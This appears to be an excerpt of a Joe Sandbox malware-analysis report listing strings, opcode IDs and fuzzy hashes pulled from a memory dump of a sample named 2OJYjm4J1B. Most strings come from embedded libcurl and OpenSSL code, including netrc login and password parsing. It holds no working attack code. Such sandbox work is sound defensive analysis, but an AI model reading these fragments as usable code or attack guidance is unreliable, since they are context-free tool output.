                                                          • String ID: #HttpOnly_$%s cookie %s="%s" for domain %s, path %s, expire %lld$;=$;$=$Added$FALSE$Replaced$TRUE$__Host-$__Secure-$cookie '%s' dropped, domain '%s' must not set cookies for '%s'$cookie '%s' for domain '%s' dropped, would overlay an existing cookie$cookie contains TAB, dropping$cookie.c$domain$expires$httponly$invalid octets in name/value, cookie dropped$libpsl problem, rejecting cookie for satety$max-age$oversized cookie dropped, name/val %zu + %zu bytes$path$secure$skipped cookie with bad tailmatch domain: %s$version
                                                          • API String ID: 0-1371176463
                                                          • Opcode ID: 474a818dfddec92d9b7562621fe2a11df8f82909b5e66cc0fa4f68acd87417e5
                                                          • Instruction ID: 48ed04d73c1e5464c367227778bf6586eb5821ff8976b4cde97936e0f6053325
                                                          • Opcode Fuzzy Hash: 474a818dfddec92d9b7562621fe2a11df8f82909b5e66cc0fa4f68acd87417e5
                                                          • Instruction Fuzzy Hash: 50B23970A28702FBEF24AE25EC42B26BBD4AF54704F14442DFC8996382E775DD788751
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %3lld %s %3lld %s %3lld %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$%2lld:%02lld:%02lld$%3lldd %02lldh$%7lldd$** Resuming transfer from byte position %lld$--:-$--:-$--:-$-:--$-:--$-:--$Callback aborted
                                                          • API String ID: 0-122532811
                                                          • Opcode ID: b56c279dba55fbdac9abc535b4ecec83847a91d8ef2706cdabe68048ade64657
                                                          • Instruction ID: ad69192c73758ec96a07094f8e0646037f780ca489c36719c2fcc8cd0163d0ee
                                                          • Opcode Fuzzy Hash: b56c279dba55fbdac9abc535b4ecec83847a91d8ef2706cdabe68048ade64657
                                                          • Instruction Fuzzy Hash: 3F421571B18701AFD718DE28CC41B6BB6EAFFC4704F048A2DF58997391E775A8548B82
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ans$attempts$ndot$out$retr$retr$rota$time$use-$usev
                                                          • API String ID: 0-359024792
                                                          • Opcode ID: 20dc241e5b04b95e38bf531b6b9e9066e26a14a95a2e84e7f2075f492bc8b8b0
                                                          • Instruction ID: dec23cc92ab087a36eae32a2050a71392d4c467ff9654058a708c709189c01de
                                                          • Opcode Fuzzy Hash: 20dc241e5b04b95e38bf531b6b9e9066e26a14a95a2e84e7f2075f492bc8b8b0
                                                          • Instruction Fuzzy Hash: 34611BA5B0930067E716A624AC63B3BB2D9DB95314F05883EFC4A9A3D3FE71D944C253
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %.*s%%25%s]$%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$%s://$:;@?+$file$file://%s%s%s$https$urlapi.c$xn--
                                                          • API String ID: 0-1914377741
                                                          • Opcode ID: 09a5bbab5772502af2fc3cb26f70138ea58d1062f1440afc2e0e3cb31fa5bc2d
                                                          • Instruction ID: edf0ef351c05e3b2ccca2d92eb55b10bb2c3a51d7266c4eda61364cc19418ed8
                                                          • Opcode Fuzzy Hash: 09a5bbab5772502af2fc3cb26f70138ea58d1062f1440afc2e0e3cb31fa5bc2d
                                                          • Instruction Fuzzy Hash: 26723A30628B629BE7318E28C456766F7D2AF91340F04C62CED8D4B293E7F6D9A4C741
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %2lld.%0lldG$%2lld.%0lldM$%4lldG$%4lldM$%4lldP$%4lldT$%4lldk$%5lld
                                                          • API String ID: 0-3476178709
                                                          • Opcode ID: 490b97e394cd44b1cc529743b0fa75373dae87be3b1de204e3b37286f5c9d186
                                                          • Instruction ID: 07d6fa1c87131b8d1dca675744e4109e7d7b845c2a687503aa1722d88a3632ad
                                                          • Opcode Fuzzy Hash: 490b97e394cd44b1cc529743b0fa75373dae87be3b1de204e3b37286f5c9d186
                                                          • Instruction Fuzzy Hash: 1D31E562734A5536EB281009CC46F3E445FC3C5B10F3A823AB616DB2D2D8F95D9441A5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: !$EVP_DecryptFinal_ex$EVP_DecryptUpdate$EVP_EncryptFinal_ex$assertion failed: b <= sizeof(ctx->buf)$assertion failed: b <= sizeof(ctx->final)$crypto/evp/evp_enc.c
                                                          • API String ID: 0-2550110336
                                                          • Opcode ID: e5dd14343c58c71ae3217338b8176817fe0b566ecf73011dfe1309f94bbadf00
                                                          • Instruction ID: 12554115b60a64e8abc9d25c347a552b7ae64d962eccc48cae966e67a5cab905
                                                          • Opcode Fuzzy Hash: e5dd14343c58c71ae3217338b8176817fe0b566ecf73011dfe1309f94bbadf00
                                                          • Instruction Fuzzy Hash: 9C324B30B4C305BBDB206B519C46FAA7791EF90708F18452EFA44A63D2D7BDA8D1864F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $.$;$?$?$xn--$xn--
                                                          • API String ID: 0-543057197
                                                          • Opcode ID: 2dd915e8b36eccd6e5ec8221cc239e839d1be4f5149783ca65a98e66eeca90c2
                                                          • Instruction ID: 65517c5e2a383aa08c2755ed1a3fa92130a36c6ef6eb8886ed646554c66b7b45
                                                          • Opcode Fuzzy Hash: 2dd915e8b36eccd6e5ec8221cc239e839d1be4f5149783ca65a98e66eeca90c2
                                                          • Instruction Fuzzy Hash: A9224A75A083019FEB2A9A24DC41BAB77D9AF98348F05493CF84997293F731DD88C752
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                                          • API String ID: 0-2555271450
                                                          • Opcode ID: ab204c45a482af2b51c3d385a570a8223b89ab53e723c613e04a23f782ba891e
                                                          • Instruction ID: 36d188cbaee5a69114ea59b16329e910a05c73cf896e8f92ad6bb31fc47ad969
                                                          • Opcode Fuzzy Hash: ab204c45a482af2b51c3d385a570a8223b89ab53e723c613e04a23f782ba891e
                                                          • Instruction Fuzzy Hash: 99C28A31A183428FC715CF28C49076AB7E2BFC8315F158A2DEC9A9B351D770ED598B86
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                                          • API String ID: 0-2555271450
                                                          • Opcode ID: ef4de3180d4d45884836b375335c49ae51ea6ad8a7b001dcad306b7b4f939531
                                                          • Instruction ID: d4bdf328567073feb1daaf3fa403dd4011e0ffc790a74222f8dfee58469ba48c
                                                          • Opcode Fuzzy Hash: ef4de3180d4d45884836b375335c49ae51ea6ad8a7b001dcad306b7b4f939531
                                                          • Instruction Fuzzy Hash: D882C271A183029FDB24CE28C58172BBBE1AFC4325F158A2DFDA997391D730DD198B46
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: default$login$macdef$machine$netrc.c$password
                                                          • API String ID: 0-1043775505
                                                          • Opcode ID: 62bc668bc6674010dc2a562aef85dd1e92896ae15e0c49efabfe6dd23b6b8fc5
                                                          • Instruction ID: c5af01aca820739d5eb47aa4782f595c6fc368a394d25119c5a744e670d7a145
                                                          • Opcode Fuzzy Hash: 62bc668bc6674010dc2a562aef85dd1e92896ae15e0c49efabfe6dd23b6b8fc5
                                                          • Instruction Fuzzy Hash: 88E16B7052C3529BE3208F1498497AFBBD4AF81788F18046CFCC557281E7BDD968DB52
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ????$Invalid input packet$SMB upload needs to know the size up front$\$\\
                                                          • API String ID: 0-4201740241
                                                          • Opcode ID: 86e488276038538539f77fa1a79de82cfb5323ad0f0dbccd78dc9f6b68dc1a30
                                                          • Instruction ID: e65db951def5ce0f8c1f8ffa1dde80881a0166c87b30e24ac004d423fe809cd0
                                                          • Opcode Fuzzy Hash: 86e488276038538539f77fa1a79de82cfb5323ad0f0dbccd78dc9f6b68dc1a30
                                                          • Instruction Fuzzy Hash: 6662E2705247429BD715CF24C4807AAB7F4FF98304F04951EE88D8B352E7B4EAA4CB96
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .DAFSA@PSL_$===BEGIN ICANN DOMAINS===$===BEGIN PRIVATE DOMAINS===$===END ICANN DOMAINS===$===END PRIVATE DOMAINS===
                                                          • API String ID: 0-2839762339
                                                          • Opcode ID: b82b2e368ea7e1dbab89acc045361e5b19043c3e3915f7e7f9980db6fd931630
                                                          • Instruction ID: 51b69a9d61f1cb50dcb062ce39120149639ecbd56fad1271f42a3f7281505254
                                                          • Opcode Fuzzy Hash: b82b2e368ea7e1dbab89acc045361e5b19043c3e3915f7e7f9980db6fd931630
                                                          • Instruction Fuzzy Hash: 3C02B6B15043419BE7359F289845B6BBFD5BF95300F18482FE98987392EB71E904CB93
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $d$nil)
                                                          • API String ID: 0-394766432
                                                          • Opcode ID: 5234c15165e25c5e3538bbeda8bc5bfa617712bc0da6b9c581ee572a55a271ed
                                                          • Instruction ID: abfb4f01e763cc2172f39a9debafe990c58ce715e101548863f00e49f63d2c43
                                                          • Opcode Fuzzy Hash: 5234c15165e25c5e3538bbeda8bc5bfa617712bc0da6b9c581ee572a55a271ed
                                                          • Instruction Fuzzy Hash: 401346706083428FD724DF29C48562ABBE1BFC9314F244A6FE9959B3A1D771EC45CB82
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0123456789$0123456789ABCDEF$0123456789abcdef$:
                                                          • API String ID: 0-3285806060
                                                          • Opcode ID: 4cdc8aeef9273964126fc61d39bc48af38a56c4485d70e395e5b0d9eb16d0ef4
                                                          • Instruction ID: 15f26e73163d0af1f14e5e05baea24b7f944fc839c210b0352c8a7fb7e5f15a6
                                                          • Opcode Fuzzy Hash: 4cdc8aeef9273964126fc61d39bc48af38a56c4485d70e395e5b0d9eb16d0ef4
                                                          • Instruction Fuzzy Hash: 3CD12672A193058BD726DF28C8A137ABBD1AF81304F155B3DE8C9876C2DB349D45D782
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .$@$gfff$gfff
                                                          • API String ID: 0-2633265772
                                                          • Opcode ID: 8459d8207e057e620cf1d9af03855443049108a225ce8fe639410900789573df
                                                          • Instruction ID: 805b68b249a432663dc08de8470587970cce8d1f27643ea7263e70219707ad27
                                                          • Opcode Fuzzy Hash: 8459d8207e057e620cf1d9af03855443049108a225ce8fe639410900789573df
                                                          • Instruction Fuzzy Hash: 0FD15B71A043468BDB24DE2DC88436ABFE2BFC4340F19892FE8599B355E770D949C792
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $
                                                          • API String ID: 0-227171996
                                                          • Opcode ID: 89a96ff487e89aebdf19bc11f161198ef7ed762c043aab9183713507e7f27628
                                                          • Instruction ID: cfdb1c10c50d43332542758730241728ecfa9487b33ca3ef95a1f8a1822e0f98
                                                          • Opcode Fuzzy Hash: 89a96ff487e89aebdf19bc11f161198ef7ed762c043aab9183713507e7f27628
                                                          • Instruction Fuzzy Hash: 5AE231B1A083818FD728DF2AC58471ABBE5BB88744F148D1EE8C997355E775E844CF82
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: -----END PUBLIC KEY-----$-----BEGIN PUBLIC KEY-----$vtls/vtls.c
                                                          • API String ID: 0-424504254
                                                          • Opcode ID: f3cce9e6d879a1ac17e945650e551ea64f508d7adff4c0c63308d3255efa3444
                                                          • Instruction ID: 5b8d5e5f17a44e1cbf45ab25f9c2a2cdfe8c7fc986fb45c9024232444e85d87a
                                                          • Opcode Fuzzy Hash: f3cce9e6d879a1ac17e945650e551ea64f508d7adff4c0c63308d3255efa3444
                                                          • Instruction Fuzzy Hash: 22317872A2835257D3365D3C6C84A357AE19FA1304F1C827DE89D973D2F6B58C20C291
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: #$4
                                                          • API String ID: 0-353776824
                                                          • Opcode ID: abb367ad09252f815a089b70d10e7318adf1bcb1e81feaf3b1c31b37ab01d63b
                                                          • Instruction ID: 1fb836921cd799d8e65ba01a2ad7aae019a95346e927e2b66891d225b13f1184
                                                          • Opcode Fuzzy Hash: abb367ad09252f815a089b70d10e7318adf1bcb1e81feaf3b1c31b37ab01d63b
                                                          • Instruction Fuzzy Hash: 7422E2355087428FC314DF68C484BBAFBE4FF84318F158A2EE89997391D774A885CB96
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: #$4
                                                          • API String ID: 0-353776824
                                                          • Opcode ID: 8c6442ad21fd0c17796323fa4a97b6694f938926aff987d17d07e0839adae3a5
                                                          • Instruction ID: 21a10011513550820fb5cc7af19f75bf81ff8116d9970ab593e7a311c17a63ff
                                                          • Opcode Fuzzy Hash: 8c6442ad21fd0c17796323fa4a97b6694f938926aff987d17d07e0839adae3a5
                                                          • Instruction Fuzzy Hash: 2012D2326087018FC724CF58C484BAABBE5FFD4318F198A7DE89997352D7749884CB96
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: H$xn--
                                                          • API String ID: 0-4022323365
                                                          • Opcode ID: 719bafd1108970b957a2ea81dc7c69e9329f1abda222c7531928105b6d5a72ba
                                                          • Instruction ID: ca94ce3375e74e3ea57454e2dcd1da004a081ce2dace022bffb84a57cbb141ae
                                                          • Opcode Fuzzy Hash: 719bafd1108970b957a2ea81dc7c69e9329f1abda222c7531928105b6d5a72ba
                                                          • Instruction Fuzzy Hash: 61E114316087158FD728DE2CD8C062ABBE2BBD4314F188A3FE99687391E774DC458B42
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Downgrades to HTTP/1.1$multi.c
                                                          • API String ID: 0-3089350377
                                                          • Opcode ID: efb71f9e2083930e130131b6b5c34fdf4428d5e43f9a9c9fb816b519c1cf02c5
                                                          • Instruction ID: 4fb434bd6a445ec58259ae39d903146622d62245a1fa19bf6e825c4ca6d6c1ca
                                                          • Opcode Fuzzy Hash: efb71f9e2083930e130131b6b5c34fdf4428d5e43f9a9c9fb816b519c1cf02c5
                                                          • Instruction Fuzzy Hash: 2EC10675A24702ABD710DF24D88176AB7E0BF94304F18452DF84997292E7B1F9F8CB92
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 127.0.0.1$::1
                                                          • API String ID: 0-3302937015
                                                          • Opcode ID: 7c51a115656c4ffcefd09c4d85277596c1967b27ad2cc6a728b2d24a75e298ef
                                                          • Instruction ID: 4ed3310f478d9d0861e07422188c7d8747f69f34fe0dc9bd541ec56c093ef2bd
                                                          • Opcode Fuzzy Hash: 7c51a115656c4ffcefd09c4d85277596c1967b27ad2cc6a728b2d24a75e298ef
                                                          • Instruction Fuzzy Hash: C0A109B1C14342ABE315DF10C855766B3E4BF99300F169A2AF8888B251F771EDD0C792
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: M 0.$NT L
                                                          • API String ID: 0-1807112707
                                                          • Opcode ID: 54651db38706e138739ee3568a86d76adaa270a9762756c8892fe72f7f49c26e
                                                          • Instruction ID: b78fd165d271412b05f20f42613b2e6ab494212d81e3ce677038d87b4cc512c0
                                                          • Opcode Fuzzy Hash: 54651db38706e138739ee3568a86d76adaa270a9762756c8892fe72f7f49c26e
                                                          • Instruction Fuzzy Hash: 8F511774624301AFDB11DF20C8847AAB3F8FF58344F148569EC489F292D7B5DAA4DB92
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: M+
                                                          • API String ID: 0-224025748
                                                          • Opcode ID: d9e1dffb9c167f2a1bfd412aa57ca9546c7a865265bd6293c312d3add4af8ce4
                                                          • Instruction ID: 392241a2a3a5a5f02e9565077f084038d5de1a434a78318e0081076ab474d87f
                                                          • Opcode Fuzzy Hash: d9e1dffb9c167f2a1bfd412aa57ca9546c7a865265bd6293c312d3add4af8ce4
                                                          • Instruction Fuzzy Hash: 1A2264735417044BE318CF2FCC81582B3E3AFD822475F857EC926CB696EEB9A61B4548
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: D
                                                          • API String ID: 0-2746444292
                                                          • Opcode ID: abc93120844dcb078d04df584af388602c4da3052e158adea212c8b27998d9d7
                                                          • Instruction ID: fea7fc1f54c1c59c461b7828f9e0acce5663e457c23a0c833ebf7184e282a7a7
                                                          • Opcode Fuzzy Hash: abc93120844dcb078d04df584af388602c4da3052e158adea212c8b27998d9d7
                                                          • Instruction Fuzzy Hash: 2E326A7190C7858BC325DF28D4806AEFBE5BFC9304F198A6DE9D953351DB30A945CB82
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: H
                                                          • API String ID: 0-2852464175
                                                          • Opcode ID: c78799917f98244fbbae6f37633f6a1f8a0cae5fc04d8ad02d72ec245ffb64b6
                                                          • Instruction ID: d31d2f59585e8e8e7235e46e9161b4a0f691d7ab55f495c9abe041f40ee05d4d
                                                          • Opcode Fuzzy Hash: c78799917f98244fbbae6f37633f6a1f8a0cae5fc04d8ad02d72ec245ffb64b6
                                                          • Instruction Fuzzy Hash: 6A91C8357083218FCB1ECE1DD49012EB7E3ABC9314F1A853DD99697792DA31AC4ACB85
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: curl
                                                          • API String ID: 0-65018701
                                                          • Opcode ID: 4fdfdfd25772cf9c637df85e1ecd07becb1e78bb90293f7e0bed6d6bc11ac74f
                                                          • Instruction ID: c232c3a55dd35819987eb626d03c09fafe7f7384552125d0592a53af700541f4
                                                          • Opcode Fuzzy Hash: 4fdfdfd25772cf9c637df85e1ecd07becb1e78bb90293f7e0bed6d6bc11ac74f
                                                          • Instruction Fuzzy Hash: EC61A6B18187459BD721DF14C8817ABB7F8BF99304F04962EFD488B212EB71E698C752
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 37dcff668a13ac7664a65d074101e8d45831704a40427edf5dff100c5f881fab
                                                          • Instruction ID: 0ce0c63af208b2e3184b04e25c9aba35e269b7360d789e20398226086a102e99
                                                          • Opcode Fuzzy Hash: 37dcff668a13ac7664a65d074101e8d45831704a40427edf5dff100c5f881fab
                                                          • Instruction Fuzzy Hash: 7312C676F483154FC30CED6DC992359FAD7A7C8310F1A893EA959DB3A0E9B9EC014681
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3eb5461328efb87861e9783b3581e7f2d97aa883510f9df698f5ad02820d1331
                                                          • Instruction ID: aed6eacc40b0d3e1b76abcabcbb9f378fa09ca89ea130d45577a8787e2bf5b0e
                                                          • Opcode Fuzzy Hash: 3eb5461328efb87861e9783b3581e7f2d97aa883510f9df698f5ad02820d1331
                                                          • Instruction Fuzzy Hash: 25121D37B515198FEB44DEA5D8483DBB3A2FF9C318F6A9534CD48AB607C635B502CA80
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d10ff4716be81d7fb9f1ad546e52dcc632b0a4f3c4a80912798fa5bfdbbef900
                                                          • Instruction ID: 5d99c951624f469e3c9b756257717d9e6dfdf4b3e7afc3ab3fe534a402fe04ed
                                                          • Opcode Fuzzy Hash: d10ff4716be81d7fb9f1ad546e52dcc632b0a4f3c4a80912798fa5bfdbbef900
                                                          • Instruction Fuzzy Hash: A9E137709283558FD324CF08C440366B7E2BB86352F34852EDC998B395E778DD6E9B89
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a486a6772340833dab6fb8f782cceb8b4192d2d954e04d259f039d577a9c2332
                                                          • Instruction ID: 986fea00d35941fff45497e48e869aa323aef6d750956a56bc781d226324e6a7
                                                          • Opcode Fuzzy Hash: a486a6772340833dab6fb8f782cceb8b4192d2d954e04d259f039d577a9c2332
                                                          • Instruction Fuzzy Hash: 6CC1AC75604B418FD724CF69C480A2ABBE2FFC6314F248A2DE4AA87791D774E846CF51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7fe907c22b4a00e371089acc248de7d458235f0001bf3bfa810f4e4dcb007528
                                                          • Instruction ID: 90e851c627bb44b1fbfcbf001a6665c8612fc55164db4501dbaa24cee7c77360
                                                          • Opcode Fuzzy Hash: 7fe907c22b4a00e371089acc248de7d458235f0001bf3bfa810f4e4dcb007528
                                                          • Instruction Fuzzy Hash: 85C170716096018BD718CF19C494269FFE1FF92318F258A6EE5AB8F791C734E984CB80
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 49e37e3fb03f93da9d9d649f0b3f10027f9cefc4c25519c2e446c373813ed613
